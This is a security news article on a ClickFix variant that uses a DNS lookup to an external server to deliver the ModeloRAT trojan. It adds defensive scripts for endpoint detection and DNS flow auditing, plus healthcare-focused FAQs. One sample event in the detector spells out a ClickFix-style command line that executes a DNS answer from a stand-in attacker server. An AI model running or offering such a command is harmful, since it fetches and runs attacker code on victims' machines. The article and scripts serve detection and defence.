
Microsoft warns of new ClickFix variant

Microsoft has flagged a new ClickFix attack variant that uses DNS lookups to deliver a remote access trojan called ModeloRAT to targeted users.


What happened

Microsoft warned that threat actors are using an evolved version of the ClickFix technique to deliver malware through a custom DNS lookup command. In this variant, a compromised or malicious site displays a fake error message instructing the target to run a command through cmd.exe. That command performs a DNS lookup against a hard-coded external DNS server rather than the system's configured resolver, and the DNS response is filtered and executed as the second-stage payload. That stage downloads a Python reconnaissance script, drops the final payload, and installs a persistence mechanism. The final payload is ModeloRAT, a remote access trojan that collects system information and can execute additional payloads on the compromised machine.


The backstory

ClickFix is a social engineering technique in which a threat actor presents a fake error message on a website and instructs the user to follow steps that look like legitimate troubleshooting. First observed in early 2024, the technique has become popular with both cybercriminal groups and state-sponsored threat actors. According to ESET's H1 2025 Threat Report, ClickFix attacks surged 517% in the first half of 2025, accounting for nearly 8% of all blocked attacks in that period and making it the second most common attack vector behind only phishing.

According to an October 2024 Sector Alert from the HHS Health Sector Cybersecurity Coordination Center (HC3), ClickFix campaigns have targeted healthcare organizations through a range of vectors, including compromised websites, phishing emails, and fake software pages. In one notable campaign, threat actors used fake Google Meet video conference pages to display false error messages about microphone and headset problems, tricking users into executing malicious code that installed infostealers on both Windows and macOS systems.


Going deeper

By routing the second-stage payload through a DNS response rather than a direct HTTP download, attackers blend the malicious traffic into normal network activity. Because the command queries a hard-coded external DNS server rather than the system's configured resolver, the lookup never passes through the organization's internal DNS servers, so resolver-side logging and filtering (DNS sinkholes, protective DNS) never see it; only inspection of outbound port 53 traffic to unapproved destinations would. The lookup also doubles as a beacon: the attacker's server sees the query and can confirm that the victim reached the second stage before serving anything further, which makes the chain more precise and harder to spot mid-chain.


What was said

Microsoft explained that, "the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver. The output is filtered to extract the 'Name:' DNS response, which is executed as the second-stage payload."

Microsoft noted this tactic "enables the attacker to reach their infrastructure and validate execution of the second-stage payload, increasing their chances of evading detection by blending malicious traffic into regular network traffic."
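How such a lookup would surface in endpoint telemetry, as an added example that is not part of Microsoft's advisory or this article: the script below scores constructed process-creation events (Sysmon-style Image, ParentImage and CommandLine fields) for the indicators Microsoft describes, namely cmd.exe, a DNS lookup with an explicit server that is not one of the organization's resolvers, output filtered for the "Name:" line, and a for /f loop that executes that output. The resolver addresses, the internal DNS suffix, the sample events and the exact command shape (nslookup inside a for /f loop) are all assumptions; the article quotes only Microsoft's description of the behaviour, not the command itself.

```python
"""Added example, not Microsoft's or Paubox's code: flag ClickFix-style DNS
lookups against an external resolver in process-creation events."""
import ipaddress
import re

# Assumed site configuration: replace with the resolvers your endpoints may use.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}
INTERNAL_DNS_SUFFIX = ".corp.example"  # assumed internal DNS suffix
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Arguments after nslookup, up to a pipe, quote, parenthesis, ampersand or cmd caret escape.
NSLOOKUP_ARGS = re.compile(r"\bnslookup(?:\.exe)?\s+([^|'()&^]*)", re.IGNORECASE)
# find/findstr invoked on the lookup output to pull out the "Name:" line.
NAME_FILTER = re.compile(r"\b(?:findstr|find)\b[^|&]*\bName", re.IGNORECASE)
# for /f runs a command and feeds each output token to the loop body as a command.
FOR_F_LOOP = re.compile(r"\bfor\s+/f\b", re.IGNORECASE)


def nslookup_server(cmdline):
    """Explicit DNS server passed to nslookup, or None when the system resolver is used."""
    m = NSLOOKUP_ARGS.search(cmdline)
    if not m:
        return None
    positional = [t for t in m.group(1).split() if not t.startswith("-")]
    return positional[1] if len(positional) >= 2 else None


def is_external_resolver(server):
    """True when the server is neither an approved resolver nor inside internal address space."""
    if server in APPROVED_RESOLVERS:
        return False
    try:
        ip = ipaddress.ip_address(server)
    except ValueError:  # a hostname rather than an address
        return not server.lower().rstrip(".").endswith(INTERNAL_DNS_SUFFIX)
    return not any(ip in net for net in RFC1918)


def assess(event):
    """Return the list of indicators matched by one process-creation event."""
    cmd = event["CommandLine"]
    reasons = []
    if "nslookup" in cmd.lower() and "cmd.exe" in (event["Image"] + event["ParentImage"]).lower():
        reasons.append("nslookup launched via cmd.exe")
    server = nslookup_server(cmd)
    if server and is_external_resolver(server):
        reasons.append(f"explicit external resolver {server}")
    if NAME_FILTER.search(cmd):
        reasons.append("output filtered for the Name: line")
    if FOR_F_LOOP.search(cmd):
        reasons.append("for /f loop executes lookup output")
    return reasons


def is_clickfix_dns_chain(reasons):
    # Alert on the combination only: an external resolver plus evidence the answer is executed.
    # A lone "nslookup host 8.8.8.8" from an admin is worth a look, not an incident.
    return any(r.startswith("explicit external resolver") for r in reasons) and (
        "output filtered for the Name: line" in reasons
        or "for /f loop executes lookup output" in reasons)


def find_suspicious(events):
    return [(ev["Id"], assess(ev)) for ev in events if is_clickfix_dns_chain(assess(ev))]


SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"Id": "evt-1", "Image": r"C:\Windows\System32\nslookup.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "nslookup mail.corp.example"},
    {"Id": "evt-2", "Image": r"C:\Windows\System32\nslookup.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nslookup -type=mx corp.example 10.0.0.53"},
    {"Id": "evt-3", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c \"for /f \"tokens=2*\" %i in "
                    "('nslookup t1.example.invalid 203.0.113.10 ^| findstr Name') do %i %j\""},
    {"Id": "evt-4", "Image": r"C:\Windows\System32\nslookup.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "nslookup -type=txt host.example 8.8.8.8"},
]

if __name__ == "__main__":
    for event_id, reasons in find_suspicious(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```

Only evt-3 trips the combined rule; evt-4 (an explicit public resolver with nothing executing the answer) matches a single indicator and is left for triage. In production the same logic belongs in the SIEM as a rule over process-creation events, with the parent process (a browser, explorer.exe or the Run dialog rather than an admin shell) as a further discriminator.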


Why it matters

This variant matters because it turns DNS, a protocol every network has to allow, into a malware delivery channel. Healthcare organizations, which depend on networked systems and often lack network-layer monitoring, are exposed. A successful ModeloRAT infection gives attackers persistent access to systems that may store or transmit protected health information. Because the chain relies on the user running what looks like a routine troubleshooting command, using tools already on the machine (cmd.exe and a DNS lookup), it sidesteps defenses that focus on file downloads or known malicious URLs. The validation step built into the DNS lookup also tells attackers exactly when they have landed, letting them move quickly before detection.


The bottom line

The evolution of ClickFix into DNS-based delivery shows that attackers are actively refining social engineering techniques to stay ahead of defenses. Organizations should train users to recognize fake error prompts and never run commands copied from browser-based instructions. Network teams should audit DNS traffic for queries sent to external resolvers rather than the organization's own, as this pattern may indicate an active ClickFix-style attack in progress; where feasible, block outbound port 53 (and 853 for DNS over TLS) from endpoints entirely and allow it only from the approved internal resolvers, so that a lookup against a hard-coded external server fails and leaves a firewall deny event instead of reaching the attacker.
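What that DNS audit looks like in practice, as an added example that is not part of this article or Microsoft's advisory: the script below reads a firewall or flow export in a generic CSV shape and reports every endpoint that sent DNS (port 53 or 853) to anything other than the approved resolvers. The resolver addresses and the flow records are constructed for the example; the one design point worth copying is that flows originating from the approved resolvers themselves are excluded, because internal DNS servers legitimately forward to upstream servers and would otherwise bury the signal.

```python
"""Added example, not the article's or Microsoft's code: audit flow logs for DNS
traffic that bypasses the organization's own resolvers."""
import csv
import io
from collections import defaultdict

APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}   # assumed: your internal DNS servers
DNS_PORTS = {53: "Do53", 853: "DoT"}              # plain DNS and DNS over TLS

# Constructed flow export (timestamp, source, destination, protocol, port, bytes); not real traffic.
SAMPLE_FLOWS = """\
ts,src,dst,proto,dport,bytes
2025-01-15T09:00:01Z,10.20.30.41,10.0.0.53,udp,53,78
2025-01-15T09:00:01Z,10.0.0.53,203.0.113.1,udp,53,80
2025-01-15T09:02:13Z,10.20.30.77,203.0.113.10,udp,53,64
2025-01-15T09:02:14Z,10.20.30.77,203.0.113.10,udp,53,512
2025-01-15T09:03:00Z,10.20.30.41,198.51.100.5,tcp,443,1420
2025-01-15T09:04:42Z,10.20.30.88,198.51.100.53,tcp,853,900
"""


def parse_flows(text):
    """Parse the CSV export into dicts with numeric port and byte counts."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["dport"] = int(row["dport"])
        row["bytes"] = int(row["bytes"])
        rows.append(row)
    return rows


def rogue_dns_flows(flows):
    """DNS-port flows whose destination is not an approved resolver.

    Flows sent by an approved resolver are skipped: those are the resolver
    forwarding upstream, which is expected and would only add noise."""
    return [f for f in flows
            if f["dport"] in DNS_PORTS
            and f["dst"] not in APPROVED_RESOLVERS
            and f["src"] not in APPROVED_RESOLVERS]


def summarize(rogue):
    """Per-endpoint view: which unapproved servers each host spoke DNS to, and how often."""
    counts = defaultdict(lambda: defaultdict(int))
    for f in rogue:
        counts[f["src"]][f"{f['dst']} ({DNS_PORTS[f['dport']]})"] += 1
    return {src: dict(dsts) for src, dsts in counts.items()}


def audit(text):
    return summarize(rogue_dns_flows(parse_flows(text)))


if __name__ == "__main__":
    for src, dsts in audit(SAMPLE_FLOWS).items():
        for dst, n in dsts.items():
            print(f"{src} -> {dst}: {n} DNS flow(s) bypassing approved resolvers")
```

In the sample, the workstation 10.20.30.77 talking port 53 to a non-resolver address twice in one second is the pattern the article describes; the DoT flow from 10.20.30.88 is the encrypted variant that a port-53-only check would miss. A single host with a handful of such flows is worth pulling endpoint telemetry for; a fleet-wide pattern usually means a misconfigured DHCP scope or a software update checking its own resolver, which is why the output is grouped by source.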


FAQs

How would a user visually distinguish a fake ClickFix error from a legitimate browser or system error?

Legitimate browser and operating system errors do not ask you to open the Run dialog or a terminal, paste something you did not type, and press Enter. Any page that does so is attempting ClickFix-style social engineering, however convincing its branding looks.


What should healthcare employees do if they see an unexpected error message on a website asking them to run a command?

Close the browser immediately and report it to your IT or security team without following any of the instructions.


What should a healthcare IT team do if they suspect ModeloRAT has already infected a machine?

Isolate the device from the network immediately to prevent further access or lateral movement. Preserve volatile evidence before reimaging, then hunt across other hosts for the persistence mechanism, the Python reconnaissance script, and DNS lookups to the external server described above, since the same lure is likely to have reached more than one user.


How can healthcare organizations train staff to recognize a ClickFix attack?

Regular security awareness training that includes real examples of fake error messages can help employees recognize and avoid this type of social engineering.
